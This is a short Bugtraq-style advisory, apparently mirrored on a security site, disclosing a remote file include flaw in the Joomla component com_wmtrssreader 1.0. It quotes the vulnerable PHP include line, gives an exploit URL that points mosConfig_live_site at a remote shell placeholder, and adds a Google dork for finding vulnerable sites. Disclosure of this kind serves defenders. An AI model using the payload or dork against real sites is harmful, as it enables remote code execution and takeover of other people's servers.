wmtrssreader joomla component 1.0 Remote File Include Vulnerability

From: cyber-crime@sibersavascilar.com
To: bugtraq@securityfocus.com
Cc:
Subject: wmtrssreader joomla component 1.0 Remote File Include Vulnerability
Date:


#########################################################################################################
# wmtrssreader joomla component 1.0 Remote File Include Vulnerability

 Component       : com_wmtrssreader version 1.0
 Download script : http://www.webmaster-tips.net/flash-rss-reader.html (you must register)
 Dicovered by    : Cyber-Crime
 Contact         : cyber-crime@hotmail.com
 Orginal         : http://www.sibersavascilar.com/category/security

==================================================================================================================================

# Vulnerable found in /administrator/components/com_wmtrssreader/admin.wmtrssreader.php


include( "$mosConfig_live_site/components/com_wmtrssreader/about.html" );


# Exploit

 
http://localhost/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll?


# google dork

 inurl:com_wmtrssreader

==================================================================================================================================

# Greetz :  www.sibersavascilar.com  www.sibersavascilar.net www.sibersavascilar.org


==================================================================================================================================

#########################################################################################################





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.